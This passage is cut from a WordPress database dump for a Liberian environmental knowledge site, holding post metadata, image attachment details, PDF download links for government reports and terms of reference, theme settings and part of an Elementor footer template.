ile\";s:110:\"Screenshot-2023-03-29-at-11-15-51-Liberia-National-Catalogue-of-Crop-Varieties-and-Species-2022.pdf-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25004;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:111:\"Screenshot-2023-03-29-at-11-15-51-Liberia-National-Catalogue-of-Crop-Varieties-and-Species-2022.pdf-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:75242;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36295,5326,'_wp_page_template','default'),(36296,5329,'_wp_attached_file','2023/03/Liberia-National-Catalogue-of-Crop-Varieties-and-Species-2022.pdf'),(36297,5329,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:5515608;}'),(36298,5326,'download_link','https://ekmsliberia.info/wp-content/uploads/2023/03/Liberia-National-Catalogue-of-Crop-Varieties-and-Species-2022.pdf'),(36299,5326,'by','MOA'),(36300,5326,'year','2022'),(36301,5326,'_pods_document_cover_image','a:1:{i:0;i:5327;}'),(36302,5326,'document_cover_image','5327'),(36303,5326,'_pods_attached_document','a:1:{i:0;i:5329;}'),(36304,5326,'attached_document','5329'),(36305,5330,'_last_editor_used_jetpack','classic-editor'),(36306,5330,'_edit_lock','1680171895:42'),(36307,5330,'_edit_last','42'),(36308,5331,'_wp_attached_file','2023/03/Screenshot-2023-03-30-at-10-08-23-Certified-Version-of-RETRAP-IPMP.pdf.png'),(36309,5331,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:82:\"2023/03/Screenshot-2023-03-30-at-10-08-23-Certified-Version-of-RETRAP-IPMP.pdf.png\";s:8:\"filesize\";i:26378;s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:82:\"Screenshot-2023-03-30-at-10-08-23-Certified-Version-of-RETRAP-IPMP.pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7930;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:82:\"Screenshot-2023-03-30-at-10-08-23-Certified-Version-of-RETRAP-IPMP.pdf-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25273;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:81:\"Screenshot-2023-03-30-at-10-08-23-Certified-Version-of-RETRAP-IPMP.pdf-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5014;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:82:\"Screenshot-2023-03-30-at-10-08-23-Certified-Version-of-RETRAP-IPMP.pdf-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27802;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36310,5332,'_wp_attached_file','2023/03/Certified-Version-of-RETRAP-IPMP.pdf'),(36311,5332,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:2140241;}'),(36312,5330,'_wp_page_template','default'),(36313,5330,'download_link','https://ekmsliberia.info/wp-content/uploads/2023/03/Certified-Version-of-RETRAP-IPMP.pdf'),(36314,5330,'by','MOA'),(36315,5330,'year','2022'),(36316,5330,'_pods_document_cover_image','a:1:{i:0;i:5331;}'),(36318,5330,'_pods_attached_document','a:1:{i:0;i:5332;}'),(36320,5330,'document_cover_image','5331'),(36321,5330,'attached_document','5332'),(36322,5334,'_edit_lock','1680172284:42'),(36323,5334,'_last_editor_used_jetpack','block-editor'),(36324,5334,'_edit_last','42'),(36325,5334,'kava_extra_enable_breadcrumbs','inherit'),(36326,5334,'post_formats',''),(36327,5334,'gallery_tab',''),(36328,5334,'kava_extra_gallery_images',''),(36329,5334,'link_tab',''),(36330,5334,'kava_extra_link',''),(36331,5334,'kava_extra_link_target','_blank'),(36332,5334,'quote_tab',''),(36333,5334,'kava_extra_quote_text',''),(36334,5334,'kava_extra_quote_cite',''),(36335,5334,'audio_tab',''),(36336,5334,'kava_extra_audio',''),(36337,5334,'kava_extra_audio_loop','false'),(36338,5334,'kava_extra_audio_autoplay','false'),(36339,5334,'kava_extra_audio_preload','false'),(36340,5334,'video_tab',''),(36341,5334,'kava_extra_video_type','library'),(36342,5334,'kava_extra_video_library',''),(36343,5334,'kava_extra_video_external',''),(36344,5334,'kava_extra_video_poster',''),(36345,5334,'kava_extra_video_width','770'),(36346,5334,'kava_extra_video_height','480'),(36347,5334,'kava_extra_video_loop','false'),(36348,5334,'kava_extra_video_autoplay','false'),(36349,5334,'kava_extra_video_preload','false'),(36350,5336,'_wp_attached_file','2023/03/lla-2.jpg'),(36351,5336,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2023/03/lla-2.jpg\";s:8:\"filesize\";i:301943;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"lla-2-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18315;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"lla-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9821;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"lla-2-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94936;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"lla-2-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38073;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:16:\"lla-2-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6183;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:17:\"lla-2-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20720;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:17:\"lla-2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53904;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:17:\"lla-2-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60527;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:17:\"lla-2-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83059;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:17:\"lla-2-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61764;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:17:\"lla-2-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120018;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(36354,5334,'_thumbnail_id','5336'),(36357,5337,'_last_editor_used_jetpack','classic-editor'),(36358,5337,'_edit_lock','1750842258:38'),(36359,5337,'_edit_last','42'),(36360,5338,'_wp_attached_file','2023/04/EPA-Terms-of-Reference-to-train-in-Eco-stoves-Production-and-Use.pdf'),(36361,5338,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:254442;}'),(36362,5339,'_wp_attached_file','2023/04/EPA-Terms-of-Reference-for-HACT-Validation-Training.pdf'),(36363,5339,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:296343;}'),(36364,5337,'_wp_page_template','default'),(36365,5337,'closed_date','2023-04-21'),(36366,5337,'owner','EPA'),(36367,5337,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-to-train-in-Eco-stoves-Production-and-Use.pdf'),(36368,5343,'_last_editor_used_jetpack','classic-editor'),(36369,5343,'_edit_lock','1680698693:42'),(36370,5343,'_edit_last','42'),(36371,5343,'_wp_page_template','default'),(36372,5343,'closed_date','2023-04-21'),(36373,5343,'owner','EPA'),(36374,5343,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-for-HACT-Validation-Training.pdf'),(36375,5346,'_last_editor_used_jetpack','classic-editor'),(36376,5346,'_edit_lock','1680699971:42'),(36377,5346,'_edit_last','42'),(36378,5347,'_wp_attached_file','2023/04/EPA-Terms-of-Reference-for-Eco-stoves-center-construction.pdf'),(36379,5347,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:251108;}'),(36380,5346,'_wp_page_template','default'),(36381,5346,'closed_date','2023-04-21'),(36382,5346,'owner','EPA'),(36383,5346,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-for-Eco-stoves-center-construction.pdf'),(36384,5353,'_edit_lock','1684746624:42'),(36385,5353,'_last_editor_used_jetpack','block-editor'),(36386,5354,'_wp_attached_file','2023/05/epa-undp.jpg'),(36387,5354,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:20:\"2023/05/epa-undp.jpg\";s:8:\"filesize\";i:206288;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"epa-undp-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17868;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"epa-undp-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9087;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"epa-undp-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74769;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"epa-undp-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31046;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:19:\"epa-undp-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6544;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:20:\"epa-undp-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17138;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:20:\"epa-undp-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37851;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:20:\"epa-undp-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39860;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:20:\"epa-undp-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59502;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:20:\"epa-undp-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51486;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:20:\"epa-undp-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76371;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(36390,5353,'_thumbnail_id','5354'),(36391,5353,'_edit_last','42'),(36392,5353,'kava_extra_enable_breadcrumbs','inherit'),(36393,5353,'post_formats',''),(36394,5353,'gallery_tab',''),(36395,5353,'kava_extra_gallery_images',''),(36396,5353,'link_tab',''),(36397,5353,'kava_extra_link',''),(36398,5353,'kava_extra_link_target','_blank'),(36399,5353,'quote_tab',''),(36400,5353,'kava_extra_quote_text',''),(36401,5353,'kava_extra_quote_cite',''),(36402,5353,'audio_tab',''),(36403,5353,'kava_extra_audio',''),(36404,5353,'kava_extra_audio_loop','false'),(36405,5353,'kava_extra_audio_autoplay','false'),(36406,5353,'kava_extra_audio_preload','false'),(36407,5353,'video_tab',''),(36408,5353,'kava_extra_video_type','library'),(36409,5353,'kava_extra_video_library',''),(36410,5353,'kava_extra_video_external',''),(36411,5353,'kava_extra_video_poster',''),(36412,5353,'kava_extra_video_width','770'),(36413,5353,'kava_extra_video_height','480'),(36414,5353,'kava_extra_video_loop','false'),(36415,5353,'kava_extra_video_autoplay','false'),(36416,5353,'kava_extra_video_preload','false'),(36417,5356,'_edit_lock','1684753711:42'),(36418,5356,'_last_editor_used_jetpack','block-editor'),(36419,5357,'_wp_attached_file','2023/05/prof.jpg'),(36420,5357,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2023/05/prof.jpg\";s:8:\"filesize\";i:241749;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"prof-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15696;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"prof-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8072;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"prof-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78485;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"prof-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29940;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:15:\"prof-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5279;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:16:\"prof-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16883;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:16:\"prof-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42682;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:16:\"prof-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49422;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:16:\"prof-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64609;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:16:\"prof-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51590;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:16:\"prof-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90685;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(36423,5356,'_wp_old_date','2023-05-22'),(36424,5356,'_thumbnail_id','5357'),(36425,5356,'_edit_last','42'),(36428,5356,'kava_extra_enable_breadcrumbs','inherit'),(36429,5356,'post_formats',''),(36430,5356,'gallery_tab',''),(36431,5356,'kava_extra_gallery_images',''),(36432,5356,'link_tab',''),(36433,5356,'kava_extra_link',''),(36434,5356,'kava_extra_link_target','_blank'),(36435,5356,'quote_tab',''),(36436,5356,'kava_extra_quote_text',''),(36437,5356,'kava_extra_quote_cite',''),(36438,5356,'audio_tab',''),(36439,5356,'kava_extra_audio',''),(36440,5356,'kava_extra_audio_loop','false'),(36441,5356,'kava_extra_audio_autoplay','false'),(36442,5356,'kava_extra_audio_preload','false'),(36443,5356,'video_tab',''),(36444,5356,'kava_extra_video_type','library'),(36445,5356,'kava_extra_video_library',''),(36446,5356,'kava_extra_video_external',''),(36447,5356,'kava_extra_video_poster',''),(36448,5356,'kava_extra_video_width','770'),(36449,5356,'kava_extra_video_height','480'),(36450,5356,'kava_extra_video_loop','false'),(36451,5356,'kava_extra_video_autoplay','false'),(36452,5356,'kava_extra_video_preload','false'),(36453,5359,'_edit_lock','1684755482:42'),(36454,5359,'_last_editor_used_jetpack','block-editor'),(36455,5360,'_wp_attached_file','2023/05/Tarpeh-dee.jpg'),(36456,5360,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:22:\"2023/05/Tarpeh-dee.jpg\";s:8:\"filesize\";i:175640;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"Tarpeh-dee-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13254;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Tarpeh-dee-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8134;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"Tarpeh-dee-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58401;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"Tarpeh-dee-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25805;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:21:\"Tarpeh-dee-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4944;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:22:\"Tarpeh-dee-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15537;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:22:\"Tarpeh-dee-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35918;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:22:\"Tarpeh-dee-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38672;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:22:\"Tarpeh-dee-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53159;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:22:\"Tarpeh-dee-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39683;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:22:\"Tarpeh-dee-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71439;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(36459,5359,'_wp_old_date','2023-05-22'),(36460,5359,'_thumbnail_id','5360'),(36461,5359,'_edit_last','42'),(36462,5359,'kava_extra_enable_breadcrumbs','inherit'),(36463,5359,'post_formats',''),(36464,5359,'gallery_tab',''),(36465,5359,'kava_extra_gallery_images',''),(36466,5359,'link_tab',''),(36467,5359,'kava_extra_link',''),(36468,5359,'kava_extra_link_target','_blank'),(36469,5359,'quote_tab',''),(36470,5359,'kava_extra_quote_text',''),(36471,5359,'kava_extra_quote_cite',''),(36472,5359,'audio_tab',''),(36473,5359,'kava_extra_audio',''),(36474,5359,'kava_extra_audio_loop','false'),(36475,5359,'kava_extra_audio_autoplay','false'),(36476,5359,'kava_extra_audio_preload','false'),(36477,5359,'video_tab',''),(36478,5359,'kava_extra_video_type','library'),(36479,5359,'kava_extra_video_library',''),(36480,5359,'kava_extra_video_external',''),(36481,5359,'kava_extra_video_poster',''),(36482,5359,'kava_extra_video_width','770'),(36483,5359,'kava_extra_video_height','480'),(36484,5359,'kava_extra_video_loop','false'),(36485,5359,'kava_extra_video_autoplay','false'),(36486,5359,'kava_extra_video_preload','false'),(36487,5363,'_last_editor_used_jetpack','classic-editor'),(36488,5363,'_edit_lock','1686916766:42'),(36489,5363,'_edit_last','42'),(36490,5364,'_wp_attached_file','2023/06/Screenshot-2023-06-16-at-11-47-55-liberia__s_-_national_redd__strategy_final.pdf.png'),(36491,5364,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:92:\"2023/06/Screenshot-2023-06-16-at-11-47-55-liberia__s_-_national_redd__strategy_final.pdf.png\";s:8:\"filesize\";i:14915;s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:92:\"Screenshot-2023-06-16-at-11-47-55-liberia__s_-_national_redd__strategy_final.pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5085;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:92:\"Screenshot-2023-06-16-at-11-47-55-liberia__s_-_national_redd__strategy_final.pdf-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14438;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:91:\"Screenshot-2023-06-16-at-11-47-55-liberia__s_-_national_redd__strategy_final.pdf-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4633;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:92:\"Screenshot-2023-06-16-at-11-47-55-liberia__s_-_national_redd__strategy_final.pdf-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20849;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36492,5365,'_wp_attached_file','2023/06/liberia__s_-_national_redd__strategy_final.pdf'),(36493,5365,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:2003909;}'),(36494,5363,'_wp_page_template','default'),(36495,5363,'download_link','https://ekmsliberia.info/wp-content/uploads/2023/06/liberia__s_-_national_redd__strategy_final.pdf'),(36496,5363,'by','FDA'),(36497,5363,'year','2006'),(36498,5363,'_pods_document_cover_image','a:1:{i:0;i:5364;}'),(36499,5363,'document_cover_image','5364'),(36500,5363,'_pods_attached_document','a:1:{i:0;i:5365;}'),(36501,5363,'attached_document','5365'),(36502,5367,'_elementor_edit_mode','builder'),(36503,5367,'_elementor_template_type','footer'),(36504,5367,'_elementor_version','3.4.1'),(36505,5367,'_elementor_pro_version','3.3.6'),(36506,5367,'_wp_page_template','default'),(36507,5367,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.910000000000000142108547152020037174224853515625},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up 